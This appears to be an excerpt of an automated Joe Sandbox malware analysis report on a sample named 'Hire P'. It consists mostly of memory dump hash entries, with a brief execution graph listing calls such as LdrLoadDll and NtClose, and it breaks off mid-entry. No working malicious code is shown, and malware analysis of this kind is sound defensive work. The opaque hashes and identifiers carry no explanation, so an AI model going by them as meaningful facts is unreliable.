                                                            • Instruction Fuzzy Hash: 81216D74B002058FCB44EF68C8848AEBBF5FF88211B0146BED906E7355EB30A945CBA1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8942fd5d1e9b7081f6c839cf9868ce6db99fadcb87f6ac62dc4f6a874b5526be
                                                            • Instruction ID: dd368cedb024410d16eb5e2ff4529523d3740fbe4e2a1d97a4b83a82fd230760
                                                            • Opcode Fuzzy Hash: 8942fd5d1e9b7081f6c839cf9868ce6db99fadcb87f6ac62dc4f6a874b5526be
                                                            • Instruction Fuzzy Hash: BC2125B1D01319AFDB10CF9AD584A9EFBF4FB08310F10842EE909A7300C3B4A904CBA5
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7f4438b7f6fa1a5bde8f0e47c4109ffefb46dce23f972725f8e463a8d72c5089
                                                            • Instruction ID: 346943d22c63f4855d20c95badda54781c61dd1f3c040322553f66fb410c2e5d
                                                            • Opcode Fuzzy Hash: 7f4438b7f6fa1a5bde8f0e47c4109ffefb46dce23f972725f8e463a8d72c5089
                                                            • Instruction Fuzzy Hash: FC119471F01106EBCB116B95D5485FEBFB0EB40366B6048A6D189F3394E23089358B9A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ca3364033640cf5e86b15b60761d594a57108db1ae048e1d44da82a9d7a5e60b
                                                            • Instruction ID: e8572410e2367d63d4a6a7556177c872fdd75a27a9394494cd592b0591c810b7
                                                            • Opcode Fuzzy Hash: ca3364033640cf5e86b15b60761d594a57108db1ae048e1d44da82a9d7a5e60b
                                                            • Instruction Fuzzy Hash: 5121F2B1D012599FDB10CF99E584ADEFBF4BB48310F14846EE419A7310C3B5A954CBA1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9fa7a32d1e0628c4c7a7a376ef8f3f39a9e75a23d8bb0828017feba4cf1eeb03
                                                            • Instruction ID: c8a5abd8af1d39f6c100d52e8048661ce42dfc321fcf4c9e305eeed544a516bf
                                                            • Opcode Fuzzy Hash: 9fa7a32d1e0628c4c7a7a376ef8f3f39a9e75a23d8bb0828017feba4cf1eeb03
                                                            • Instruction Fuzzy Hash: B92172B4E1124ADFCB41CFB9C5446AEFBF1AB08351F24846AD814E7350E7349A50CFA1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 02382138e3a466493bb96e38c8b89790ee619b51775163de078d23b5648d9d5f
                                                            • Instruction ID: 3e144040d525db3eedf160d8da4771c9672c21f9d3fae2ff296329a3ddf7b1e4
                                                            • Opcode Fuzzy Hash: 02382138e3a466493bb96e38c8b89790ee619b51775163de078d23b5648d9d5f
                                                            • Instruction Fuzzy Hash: DA11BA32B042848FCB01AF7C9C541AE7BA1EFC2325B148B7FC442DB2A4DB289486C3D1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9dfca962d3bad6bad20c5c4777d6cb66f9c100a3214264c204170dfc2587d9c5
                                                            • Instruction ID: d41260451f85ec22438c78f80d7ad3a545506a9f8501d67546dc659f4984bdff
                                                            • Opcode Fuzzy Hash: 9dfca962d3bad6bad20c5c4777d6cb66f9c100a3214264c204170dfc2587d9c5
                                                            • Instruction Fuzzy Hash: 27213D30900619DFCB14EF68D9556EEB7B1AF49301F00862ED4467B254EB74A998CB92
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1525218193.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_ead000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0842d63636c04f12578884b97208dcd3b995689bd7418cdd0a82e6b5bcf4e62e
                                                            • Instruction ID: aaf61278de5dd77798b2718fc435fc977755ab95a3ef5b838a64d08aeaf207c3
                                                            • Opcode Fuzzy Hash: 0842d63636c04f12578884b97208dcd3b995689bd7418cdd0a82e6b5bcf4e62e
                                                            • Instruction Fuzzy Hash: 042141755093808FDB12CF24D9D4715BF72EB46214F29C5DAD8498F6A7C33A980ACB62
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ee3fcb8f2b4c814346bad79a4a97e82319d68c51c0fe20c1ffdff0c4e28fb94e
                                                            • Instruction ID: f52adf665bacfa16b6051633695dffe36cae06693ae00e52ee2482c62253f615
                                                            • Opcode Fuzzy Hash: ee3fcb8f2b4c814346bad79a4a97e82319d68c51c0fe20c1ffdff0c4e28fb94e
                                                            • Instruction Fuzzy Hash: EB11E3B4E0434A8FDB00EF68C8117AEBBB1EF05314F14426AC055BB391D7758956CBD2
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 63c1732de350cddf7dbc3313d5ab6266b1bb72be8898ed39facab8d42b4e24b0
                                                            • Instruction ID: 386045e66dc3b7b015a8ce362ab59807102ff3e2a2ff4beb8f55927453557f7e
                                                            • Opcode Fuzzy Hash: 63c1732de350cddf7dbc3313d5ab6266b1bb72be8898ed39facab8d42b4e24b0
                                                            • Instruction Fuzzy Hash: 07110E347102109FCB04DB68D848A6FBBFAFF89700F0184AAE008DB376EA719D0587A1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1525183963.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_e9d000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 21e913fbe4a6093fe52002ebff3728cbe293fe76fa7d723964536c1d21f6342d
                                                            • Instruction ID: 0b302ef37bb53037b88f85b5e6e3fdb2eed60890e847d940e5e41ab149cf0be7
                                                            • Opcode Fuzzy Hash: 21e913fbe4a6093fe52002ebff3728cbe293fe76fa7d723964536c1d21f6342d
                                                            • Instruction Fuzzy Hash: D221CD76408240DFCF06CF00D9C4B16BF62FB84314F24C1A9EC081A266C33AD82ACBA1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fd02f7ca0a179820dcccd1b07e3a0cf66e53d25142ca8b5546ad91c1f8732044
                                                            • Instruction ID: 4a58c94f5dc3d565b863b2645b730d08a92699b2dfb5ea461392ca3ee9987736
                                                            • Opcode Fuzzy Hash: fd02f7ca0a179820dcccd1b07e3a0cf66e53d25142ca8b5546ad91c1f8732044
                                                            • Instruction Fuzzy Hash: 9B01C432605118EF8F055F58F8448AB7F2BEB893A6708801AF905D7215CB328C369BD9
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 86970b9ca5a76b1b9853e5715441c688a0ce9658b27f84756f6cf8e97a1ab17a
                                                            • Instruction ID: c0ada5af24738b57ca9961c4c8ee6487dccfbb65d34b8ce68f1c52739825d575
                                                            • Opcode Fuzzy Hash: 86970b9ca5a76b1b9853e5715441c688a0ce9658b27f84756f6cf8e97a1ab17a
                                                            • Instruction Fuzzy Hash: D2118E34750115AFDB04DB69D888A6FBBFAFFC8700F108869E109DB365EAB1AD058791
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1525183963.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_e9d000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                            • Instruction ID: e875beb783a3f3908d565cefd994f4cb7e5381318fdd46c4d1c9dd5eb147574c
                                                            • Opcode Fuzzy Hash: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                            • Instruction Fuzzy Hash: 0C112672404240DFCF12CF00D9C4B16BF71FB94324F24C2A9D8091B256C33AE85ACBA1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4e5479632ada9d55a53d29c4076c322b8dc6e59add3fcc84c73e9bc18cfac3d9
                                                            • Instruction ID: d7d14a5d8b158ccd40bc68223119e6a3db7a56c692342a4719279f22b1c6e224
                                                            • Opcode Fuzzy Hash: 4e5479632ada9d55a53d29c4076c322b8dc6e59add3fcc84c73e9bc18cfac3d9
                                                            • Instruction Fuzzy Hash: 1C01B13A3406108FD718AA3AD890B6E77E7AFC4665F1444BFD20ADB351CE359C45C781
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1525218193.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_ead000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
                                                            • Instruction ID: 10647741a03d2e1a298ccce607370f44fbbb8ee4ad4659a95444a1bf602c1358
                                                            • Opcode Fuzzy Hash: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
                                                            • Opcode Fuzzy Hash: 50881fd87d12fdd9ac5d8fd157c715b572f7cf5ce48a0413788131d795064953
                                                            • Instruction Fuzzy Hash: 7DF0A4B4D142089FCB44DFA9E8455ADBBF4EB09311F0099ABD869E3340EB705A558F41
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc2658edc19a290904d3d0917285d1ea8d580c2821d90bb61f89b441bd568eed
                                                            • Instruction ID: 71f6ff26f6ca538a193004ceed52c07f054526ea7064205ea2d3cf6e55d98e40
                                                            • Opcode Fuzzy Hash: fc2658edc19a290904d3d0917285d1ea8d580c2821d90bb61f89b441bd568eed
                                                            • Instruction Fuzzy Hash: 9FD05E3BA8512056E5209A15BCC17D93392FBC8326F2A8D6BE095E7248C42AD9964252
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e0e683520e6bd12915b82a26e472998bc999b6cbdf74001e6294827e548d8d09
                                                            • Instruction ID: 73799785cbed320b5c04a382405a5d7ce675d3676ccb10b3534c21ba7ddd1802
                                                            • Opcode Fuzzy Hash: e0e683520e6bd12915b82a26e472998bc999b6cbdf74001e6294827e548d8d09
                                                            • Instruction Fuzzy Hash: F2E0C234C01208DBCB10EFB9C8842ADBBF89B40326F2044AED80563380E6705EA1DA82
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d5d1ce665dfdcff3fbe4d06b5484f439558005d0961b48fa3862c8945ce46fa0
                                                            • Instruction ID: 80836ee9fd51ce36c16bfccfb91d3f3d3eccbc2c804803aae3264202bfc6eaf5
                                                            • Opcode Fuzzy Hash: d5d1ce665dfdcff3fbe4d06b5484f439558005d0961b48fa3862c8945ce46fa0
                                                            • Instruction Fuzzy Hash: 57D02B315001A82FC7025F5AE9008C2BFB49E56150305C1FBE008DF032C325881BCB51
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 124a637c1512e8a3ce699be28c99e50bcd741f36e9b48fe599c127659c644139
                                                            • Instruction ID: f0c859aa1f51a96532567712e7b1a1037943c4fcaa52a00628d15f4d76eb8df3
                                                            • Opcode Fuzzy Hash: 124a637c1512e8a3ce699be28c99e50bcd741f36e9b48fe599c127659c644139
                                                            • Instruction Fuzzy Hash: 64E05B71A55285CBDF605FB4E42C7AB3FD49B00756F0A80BDDA85CA282EA78C164D205
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8265152146668e7a2156e75bd22a702dc5ffc783b733de9af9d1ef52a01f90b9
                                                            • Instruction ID: ece70da1ec333c41528b5fbfeb163efc91a1fddef7ca3bf6f7d29a6d82801a79
                                                            • Opcode Fuzzy Hash: 8265152146668e7a2156e75bd22a702dc5ffc783b733de9af9d1ef52a01f90b9
                                                            • Instruction Fuzzy Hash: 9FD01230A543089FDF105BB2D81C7677BE8EB00662F00843AE905C6350EB75D4A0C555
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7c575ffb02fd39229b98ad03ddbcdc09e256e2005c1fc96e08815a2e1c825ad5
                                                            • Instruction ID: f8a094f1028efeaa4424fd5e70b3a452d12b9f5b6447b05f6c78fa0f73a18ae7
                                                            • Opcode Fuzzy Hash: 7c575ffb02fd39229b98ad03ddbcdc09e256e2005c1fc96e08815a2e1c825ad5
                                                            • Instruction Fuzzy Hash: 48C012361000297B4B01AB85D800C86FBADAF49665304C056E5088B121D662E522DBD1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 839ce143505c5adcd901914023c3e618f286748adf310a3984e76649ace5a261
                                                            • Instruction ID: 0fe9db6b517c7d98b36fe919a10023ae82481cb71c99bf60143c0d3ad6327cd6
                                                            • Opcode Fuzzy Hash: 839ce143505c5adcd901914023c3e618f286748adf310a3984e76649ace5a261
                                                            • Instruction Fuzzy Hash: D4C0023A04110DBBCF025FC0E815AD93F26FB09750F048401FA5908161C7B38971FB91
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8067163fef37b573833526fc9826406923ddcf9e791d0dd5b5d3016d6acca0d2
                                                            • Instruction ID: f85546aeba67db84bd03d97d4e474598b9ae2d25a9504c23060de3eed1c38862
                                                            • Opcode Fuzzy Hash: 8067163fef37b573833526fc9826406923ddcf9e791d0dd5b5d3016d6acca0d2
                                                            • Instruction Fuzzy Hash: 93C0023A04020DBBCF025EC1EC15EDA3F2AFB09750F048401FA590416187B39970FBA1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d572d12ec1c70c566de7ea3cae6fa9243231403cf1ea3f2b797863a7ae46d66f
                                                            • Instruction ID: 763349fae68842cff08a42af1779ef30929f6f4afee046708676529e7e74b4c4
                                                            • Opcode Fuzzy Hash: d572d12ec1c70c566de7ea3cae6fa9243231403cf1ea3f2b797863a7ae46d66f
                                                            • Instruction Fuzzy Hash: F6B092A9695602A66100A2645948B2FA441AFE5700B409812B248604988830A87AE52B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #sD1
                                                            • API String ID: 0-12551166
                                                            • Opcode ID: 19fd51da52d7c2842e42a6ffbfc4d5859ad0da7fcd6cccbce4524abbf42d984a
                                                            • Instruction ID: 1548820c9d966b1f3ffa49b913b415653602859efa23503d2a4a30a149dd6856
                                                            • Opcode Fuzzy Hash: 19fd51da52d7c2842e42a6ffbfc4d5859ad0da7fcd6cccbce4524abbf42d984a
                                                            • Instruction Fuzzy Hash: A4E1FC74E102198FCB54DFA9C9909AEFBB2FF89305F24C169D814A7355DB31A982CF60
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1527936836.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_4f10000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5ed55d7a49f38240797c2e2ac6dce3f3a40b0d13bfd651a4a290233161590eff
                                                            • Instruction ID: dc3c916d1918909a7f84bb02f0be360be594edb44a43f9e8868b74c44096b50a
                                                            • Opcode Fuzzy Hash: 5ed55d7a49f38240797c2e2ac6dce3f3a40b0d13bfd651a4a290233161590eff
                                                            • Instruction Fuzzy Hash: 8312A4B1C01746EADB10CF65F97C1893BB1FB85328B504209D2612B7E9DBBD19AACF44
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 358b117b111b97bf09414163ebba1c771adc7c47e00eeec45fab9c63bf089fc2
                                                            • Instruction ID: de9254db4ea83a57f589b508120bb061e85113567c34e29b5d632fac4d60ef11
                                                            • Opcode Fuzzy Hash: 358b117b111b97bf09414163ebba1c771adc7c47e00eeec45fab9c63bf089fc2
                                                            • Instruction Fuzzy Hash: 7FE1F974E002198FCB14DFA9C9909AEFBB2FF89305F24C169D814AB355DB31A942CF61
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 80a9558593eee1d138c317512c95801fe7e7168ea327a0200790f91aab678881
                                                            • Instruction ID: 0713e9d3d66c27a7b3fdad31e382e53753f60f2543469c25a57e14fb48558991
                                                            • Opcode Fuzzy Hash: 80a9558593eee1d138c317512c95801fe7e7168ea327a0200790f91aab678881
                                                            • Instruction Fuzzy Hash: 7FE11874E011198FCB54DFA9C9909AEFBB2FF88305F24C169D814AB355DB31A982CF61
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 024cfd0884f4321755fb759e22e476bbd559512811ac5d84b4ca75084ccb576a
                                                            • Instruction ID: 547a997ada890ce4d032b62c53fc28238607dc592aa7068c0a60e226958bda8f
                                                            • Opcode Fuzzy Hash: 024cfd0884f4321755fb759e22e476bbd559512811ac5d84b4ca75084ccb576a
                                                            • Instruction Fuzzy Hash: DAE1F974E002198FCB54DFA9C9909AEFBB2FF89305F24C169D814AB355DB31A942CF61
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 63cad74006ae6778eadaed7b16d04a8ba9aae6fd8d386ae0fcce064cd883ebcc
                                                            • Instruction ID: 8c967e3a4f59e7c7c05dc1df28a8e992680b868de1bff081ca9cd77645834085
                                                            • Opcode Fuzzy Hash: 63cad74006ae6778eadaed7b16d04a8ba9aae6fd8d386ae0fcce064cd883ebcc
                                                            • Instruction Fuzzy Hash: 34E1F974E001198FCB14DFA9C9849AEFBB2FF89305F24D169D814AB356DB35A942CF60
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1525462563.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2820000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 13bf80a1e7d7db9ed5850021cc50620c44fb9e0291cd60fc1ac5a0767820b131
                                                            • Instruction ID: 7d8d4a4b3e354ebe221d64f4112c8eea0e0ef53a71e2c4109817d40761aa8bac
                                                            • Opcode Fuzzy Hash: 13bf80a1e7d7db9ed5850021cc50620c44fb9e0291cd60fc1ac5a0767820b131
                                                            • Instruction Fuzzy Hash: 65A16D3AE002158FCF15DFB4C44059EBBB2FF88304B14456AE905EB665DB31E99ACF80
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1527936836.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_4f10000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d267946160a3b54e3958d98b503e51dbac2ac5f59d4a543ecb8c1d7fcdf4abac
                                                            • Instruction ID: d0312d004d3c6b73b8d708e317d313138313369509b1fe411f85e6b0aae642da
                                                            • Opcode Fuzzy Hash: d267946160a3b54e3958d98b503e51dbac2ac5f59d4a543ecb8c1d7fcdf4abac
                                                            • Instruction Fuzzy Hash: 53C124B1C01746AFDB10CF65F8781897BB1FB85328B514209D2616B3E9DBBC19AACF44
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 57b60d5c49a7f56e430d34992f1ca4aa7e831e44d0c5b640c457e140ffb4bc54
                                                            • Instruction ID: 7df8ee040fcc3fed233cd2eb48fcde92cd1842f4590d35d451bf5ef2550913a5
                                                            • Opcode Fuzzy Hash: 57b60d5c49a7f56e430d34992f1ca4aa7e831e44d0c5b640c457e140ffb4bc54
                                                            • Instruction Fuzzy Hash: 6C511974E002198BCB14CFA9C9845AEFBF6FF89305F24C169D418AB356DB359942CFA1

                                                            Execution Graph

                                                            Execution Coverage:1.3%
                                                            Dynamic/Decrypted Code Coverage:4.8%
                                                            Signature Coverage:7.5%
                                                            Total number of Nodes:146
                                                            Total number of Limit Nodes:13

                                                            Control-flow Graph

                                                            control_flow_graph 91 417793-4177af 92 4177b7-4177bc 91->92 93 4177b2 call 42f323 91->93 94 4177c2-4177d0 call 42f923 92->94 95 4177be-4177c1 92->95 93->92 98 4177e0-4177f1 call 42dd83 94->98 99 4177d2-4177dd call 42fbc3 94->99 104 4177f3-417807 LdrLoadDll 98->104 105 41780a-41780d 98->105 99->98 104->105
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417805
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_Hire P.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 398b2a412e78966941bbc00af36c1ba151ff0cffd571e2978ca56ccaa8df4b4d
                                                            • Instruction ID: 8c201cb86210103d8ff0389f06be1b6184587a7a4bbc6cbf00069c90d1d8dc7c
                                                            • Opcode Fuzzy Hash: 398b2a412e78966941bbc00af36c1ba151ff0cffd571e2978ca56ccaa8df4b4d
                                                            • Instruction Fuzzy Hash: F3015EB5E0020DBBDB10DAE1DC42FDEB7789B14308F4041AAE91897280FA34EB488B95

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 121 42c633-42c66c call 4047d3 call 42d873 NtClose
                                                            APIs
                                                            • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C667
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_Hire P.jbxd
                                                            Yara matches
                                                            Similarity
